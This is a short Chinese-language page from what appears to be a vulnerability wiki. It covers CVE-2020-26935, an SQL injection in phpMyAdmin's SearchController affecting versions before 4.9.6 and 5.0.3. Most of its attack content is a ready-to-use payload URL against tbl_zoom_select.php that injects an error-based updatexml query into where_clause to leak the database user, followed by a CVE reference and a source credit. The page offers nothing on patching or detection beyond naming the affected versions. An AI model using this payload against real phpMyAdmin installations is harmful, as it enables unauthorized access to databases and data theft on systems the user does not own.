menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right CVE-2020-26935 phpmyadmin后台SQL注入.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2020-26935 phpmyadmin后台SQL注入.md
    601 B / 2021-05-21 09:14:38
        # CVE-2020-26935 phpmyadmin后台SQL注入

在4.9.6之前的phpMyAdmin和5.0.3之前的5.x的SearchController中发现一个问题。在phpMyAdmin如何处理搜索功能中的SQL语句中发现了一个SQL注入漏洞。攻击者可以利用此漏洞将恶意SQL注入查询。

Payload:


```sql
http://127.0.0.1/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
```

![](media/16097301750220/16097301904175.jpg)


Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26935

via:copy@xianzhi

from:https://xz.aliyun.com/t/8524
    links
    file_download